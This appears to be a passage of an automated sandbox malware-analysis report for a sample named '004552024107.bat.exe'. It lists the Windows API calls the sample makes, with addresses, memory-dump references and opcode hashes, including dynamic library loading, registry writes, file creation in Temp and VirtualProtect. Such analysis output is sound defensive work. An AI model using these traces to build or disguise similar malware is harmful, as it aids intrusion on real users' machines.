                                        • Instruction Fuzzy Hash: 4DE09AB4A00209BFFB109F65AD09F7B776CE704714F418425B914F2151EB7498148A7C
                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,00000000,?,0040351A,0000000C), ref: 004066C7
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004066E2
                                          • Part of subcall function 00406647: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040665E
                                          • Part of subcall function 00406647: wsprintfA.USER32 ref: 00406697
                                          • Part of subcall function 00406647: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004066AB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                        • String ID:
                                        • API String ID: 2547128583-0
                                        • Opcode ID: 6364b50fcd8a78884de1a109c3061c8e2e734accc18c0610f9b5885e266cf418
                                        • Instruction ID: a472cff2ba870c31c69f4352ad77424fb7bed112d4ffd52c95bf20a34481097e
                                        • Opcode Fuzzy Hash: 6364b50fcd8a78884de1a109c3061c8e2e734accc18c0610f9b5885e266cf418
                                        • Instruction Fuzzy Hash: BAE08C73A04210ABD610A6709E0883B73ACAF897413030C3EF952F2240DB3ADC32966E
                                        APIs
                                        • GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\004552024107.bat.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                        • CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: File$AttributesCreate
                                        • String ID:
                                        • API String ID: 415043291-0
                                        • Opcode ID: 4c035aff046b4d43788645f88f630755698ea216f1f6cd5eefec511dda558379
                                        • Instruction ID: 0febe3887fb1e567d40345103610fd6f3e8d71b3c6328ccb34cdb50f288ecb70
                                        • Opcode Fuzzy Hash: 4c035aff046b4d43788645f88f630755698ea216f1f6cd5eefec511dda558379
                                        • Instruction Fuzzy Hash: 23D09E31254301AFEF099F20DE16F2E7AA2EB84B00F11952CB682A41E0DA7158299B15
                                        APIs
                                        • CreateDirectoryA.KERNELBASE(?,00000000,004033CB,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004058F7
                                        • GetLastError.KERNEL32(?,00000008,0000000A,0000000C), ref: 00405905
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: CreateDirectoryErrorLast
                                        • String ID:
                                        • API String ID: 1375471231-0
                                        • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                        • Instruction ID: 226d66ac6a6a747d722d053d5b09978fff7ae735be90135577c6d3bd4ef0b281
                                        • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                        • Instruction Fuzzy Hash: F9C04CB120490ADED6505B319F0971B7A51AB50751F175839A586E40A0DB348455DD2E
                                        APIs
                                        • EnumWindows.USER32(00000000), ref: 6C602B87
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86267191150.000000006C601000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C600000, based on PE: true
                                        • Associated: 00000000.00000002.86267155201.000000006C600000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000000.00000002.86267225002.000000006C604000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000000.00000002.86267260674.000000006C606000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c600000_004552024107.jbxd
                                        Similarity
                                        • API ID: EnumWindows
                                        • String ID:
                                        • API String ID: 1129996299-0
                                        • Opcode ID: 52f46d0a4b0b22ee765a3a94507c9eb2c0fa322a3da8923fe705d04d9f4636de
                                        • Instruction ID: aebe6927e73ec3957d164da8b0724c59e98789f2ca71e98fc4d60af9b41b3d99
                                        • Opcode Fuzzy Hash: 52f46d0a4b0b22ee765a3a94507c9eb2c0fa322a3da8923fe705d04d9f4636de
                                        • Instruction Fuzzy Hash: 1D4140717042049FDB289F66DBC9B9D37B8EF4635CF108929E506F6A10CB3898858F9D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: wsprintf
                                        • String ID:
                                        • API String ID: 2111968516-0
                                        • Opcode ID: 27d70afe983ce046a9cdbd576e9bb3ab08da78768c3b3dac89c271fd87d57e25
                                        • Instruction ID: c5fbe62f9b4e2cb89eed07bb10574c4b4a04671343a68c93ee4f329e73b59f15
                                        • Opcode Fuzzy Hash: 27d70afe983ce046a9cdbd576e9bb3ab08da78768c3b3dac89c271fd87d57e25
                                        • Instruction Fuzzy Hash: 3521B530D04289EEDF318B6886586EEBBB09F01314F14407FE4D1B72E2C6BC8985CB69
                                        APIs
                                        • MoveFileA.KERNEL32(00000000,00000000), ref: 004016AA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: FileMove
                                        • String ID:
                                        • API String ID: 3562171763-0
                                        • Opcode ID: 01db277db8653d624179d7b600e08ca7f67f5e45fdde97e81b8b39cbf95d4e5b
                                        • Instruction ID: 67493920040547a329b99de5d89bb6d269ebd8b6645208cc7e8d7a7b283b3978
                                        • Opcode Fuzzy Hash: 01db277db8653d624179d7b600e08ca7f67f5e45fdde97e81b8b39cbf95d4e5b
                                        • Instruction Fuzzy Hash: 09F0B431608125A7DF20BB765F5DE5F52A49B41378B20423BF212B21D1DABDC643856E
                                        APIs
                                        • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402776
                                          • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: FilePointerwsprintf
                                        • String ID:
                                        • API String ID: 327478801-0
                                        • Opcode ID: d0d9330acd65b2e867353bc74e86739eab35bf528f3ad37c96d6fee4195676f1
                                        • Instruction ID: 00adb5ebf99275c5c47ff66d1c826bee854e75ad94e87541b3f98b02de3c6d9f
                                        • Opcode Fuzzy Hash: d0d9330acd65b2e867353bc74e86739eab35bf528f3ad37c96d6fee4195676f1
                                        • Instruction Fuzzy Hash: E3E09272A04104AFDF50FBA4AE49DAF76B8EB40359B10043FF202F00C2CA7C4A538A2D
                                        APIs
                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402402
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: PrivateProfileStringWrite
                                        • String ID:
                                        • API String ID: 390214022-0
                                        • Opcode ID: 3326b8378841c5f3540bed9b182ec42c057636b7d1278427695ffb5e145c9da6
                                        • Instruction ID: f24de8215b53ecbcf80a61348f6bfc7870897c54b3e6c90e9d08f7162164e460
                                        • Opcode Fuzzy Hash: 3326b8378841c5f3540bed9b182ec42c057636b7d1278427695ffb5e145c9da6
                                        • Instruction Fuzzy Hash: 9DE04F3160413A6BEB6036B11F8D97F2159AB84314B14053EBA11B62C6D9FC8E8352A9
                                        APIs
                                        • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402D0F,00000000,?,?), ref: 0040616A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                        • Instruction ID: bbdc12591f07ec5b960d4a172b59ed2570ed34ba37628b65f55bcc9503456b15
                                        • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                        • Instruction Fuzzy Hash: 7AE0E6B2020109BEEF099F60DC1AD7B772DE708310F01492EFA06D4151E6B5E9705634
                                        APIs
                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403343,00000000,0041D440,000000FF,0041D440,000000FF,000000FF,00000004,00000000), ref: 00405EDB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: 11d7c7005d0d3054af3b9be2f3a82004ed33d4240877e49ff836af06555e7eff
                                        • Instruction ID: 0d77a24040528495e1d5683a333844bda4a24a81b27895c3293bddb668a77566
                                        • Opcode Fuzzy Hash: 11d7c7005d0d3054af3b9be2f3a82004ed33d4240877e49ff836af06555e7eff
                                        • Instruction Fuzzy Hash: 20E0EC3221065EABDF509F55DC00EEB7B6CEB05360F004837F965E2150D631EA219BE9
                                        APIs
                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040338D,00000000,00000000,004031B7,000000FF,00000004,00000000,00000000,00000000), ref: 00405EAC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 62c77d97b5b576e4a72063145ecbe95ee4dab9ee0079c0f8f42f41321a19b9da
                                        • Instruction ID: c4f2c5db2c8838af9825f3b875f3a0ad88d5b51994199861a780369f0be58439
                                        • Opcode Fuzzy Hash: 62c77d97b5b576e4a72063145ecbe95ee4dab9ee0079c0f8f42f41321a19b9da
                                        • Instruction Fuzzy Hash: E4E04F32210619ABDF109F60DC04EAB3B6CEB00351F000432F954E2140D230E9118AE4
                                        APIs
                                        • VirtualProtect.KERNELBASE(6C60504C,00000004,00000040,6C60503C), ref: 6C6029CF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86267191150.000000006C601000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C600000, based on PE: true
                                        • Associated: 00000000.00000002.86267155201.000000006C600000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000000.00000002.86267225002.000000006C604000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000000.00000002.86267260674.000000006C606000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c600000_004552024107.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: a3e8dfe85e6f43b103babf907cffc870bfce0bbdaba6b7fc8426f213a036aa7b
                                        • Instruction ID: 15e2ed4fc7eb223372c833aae936229e972bcf98db70207603f42b4dc5da9e2e
                                        • Opcode Fuzzy Hash: a3e8dfe85e6f43b103babf907cffc870bfce0bbdaba6b7fc8426f213a036aa7b
                                        • Instruction Fuzzy Hash: 85F092B0705280DEDB64CF2A86C4B0E3BF4BB2A355F11892EE14BF6641E37444448F9D
                                        APIs
                                        • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402440
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: PrivateProfileString
                                        • String ID:
                                        • API String ID: 1096422788-0
                                        • Opcode ID: 2bf3f178d14cd4560723ce1317423526718b1f73ef5608a9eed72cfac383f117
                                        • Instruction ID: 16d05768d70be94792168112439c0a82a49a1a045ba9b991e9e4b5323ac17763
                                        • Opcode Fuzzy Hash: 2bf3f178d14cd4560723ce1317423526718b1f73ef5608a9eed72cfac383f117
                                        • Instruction Fuzzy Hash: 2CE04F3190821DBAEB007FA08F09AAD2A69AF01720F10002AFA507A0D1E6B98583971D
                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,004061A1,?,?,?,?,00000000,?), ref: 00406137
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: Open
                                        • String ID:
                                        • API String ID: 71445658-0
                                        • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                        • Instruction ID: 4278cf0171cf0b678593f71500b3925c4415a8e9ce87015ff7d519d2eb21bae6
                                        • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                        • Instruction Fuzzy Hash: BCD0123204020DBBDF119E90AD01FAB3B1DEB48350F014826FE07A8091D775D570A724
                                        APIs
                                        • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015CD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: ad2c1245eb71982fcc6b079eee79e7d617a05ea2d30047a0a3aab57077eeae64
                                        • Instruction ID: 7d2cdf6a56bb8b2c4d8e447006d96498fe5724c9cded2cbb68f68f822827988b
                                        • Opcode Fuzzy Hash: ad2c1245eb71982fcc6b079eee79e7d617a05ea2d30047a0a3aab57077eeae64
                                        • Instruction Fuzzy Hash: BED01732708214DBDF60DBA8AF08A9FB3A4AB10328B20413BD211F21D1D6B9C5469B2D
                                        APIs
                                        • SendMessageA.USER32(00010416,00000000,00000000,00000000), ref: 0040438B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
